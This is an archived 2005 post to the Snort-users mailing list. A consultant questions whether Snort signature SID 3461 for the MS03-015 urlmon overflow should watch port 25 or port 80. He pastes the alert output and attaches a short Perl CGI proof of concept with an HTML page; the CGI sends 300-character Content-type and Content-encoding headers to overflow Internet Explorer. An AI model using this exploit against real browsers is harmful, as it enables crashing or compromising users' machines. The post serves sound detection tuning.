Snort mailing list archives
SMTP Content-Type overflow attempt SID 3461
From: "Craig Mueller" <cmueller () alebra com>
Date: Mon, 26 Sep 2005 09:58:11 -0500
I've seen the following alert triggered [**] [1:3461:2] SMTP Content-Type overflow attempt [**][Classification: Attempted Administrator Privilege Gain] [Priority: 1] 09/25-11:11:06.816693 x.y.z.1:35499 -> 192.168.1.10:25
TCP TTL:240 TOS:0x10 ID:0 IpLen:20 DgmLen:2776 ***AP*** Seq: 0xCE9CF6A4 Ack: 0xDEEA2DBD Win: 0x40B0 TcpLen: 20 [Xref => http://www.microsoft.com/technet/security/bulletin/MS03-015.mspx][Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2003-0113][Xref => http://www.securityfocus.com/bid/7419]Yet the Microsoft fix is for Internet Explorer, yet the signature looks for traffic on port TCP / 25. I think the signature should look for this exploit on TCP port 80
Attached is the sample exploit, which would also only effect port 80.. !/usr/bin/perl # # Name this file as "urlmon-bo.cgi" # $LONG="A"x300; print "Content-type: $LONG\r\n"; print "Content-encoding: $LONG\r\n"; print "\r\n"; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >8- - <html> <body> <img src="urlmon-bo.cgi"> </body> </html> -- Craig Mueller CISSP Senior Consultant Alebra Technologies www.alebra.com 612-436-8204 ------------------------------------------------------- SF.Net email is sponsored by: Tame your development challenges with Apache's Geronimo App Server. Download it for free - -and be entered to win a 42" plasma tv or your very own Sony(tm)PSP. Click here to play: http://sourceforge.net/geronimo.php _______________________________________________ Snort-users mailing list Snort-users () lists sourceforge net Go to this URL to change user options or unsubscribe: https://lists.sourceforge.net/lists/listinfo/snort-users Snort-users list archive: http://www.geocrawler.com/redir-sf.php3?list=snort-users
Current thread:
- SMTP Content-Type overflow attempt SID 3461 Craig Mueller (Sep 26)
- Re: SMTP Content-Type overflow attempt SID 3461 Alex Kirk (Sep 26)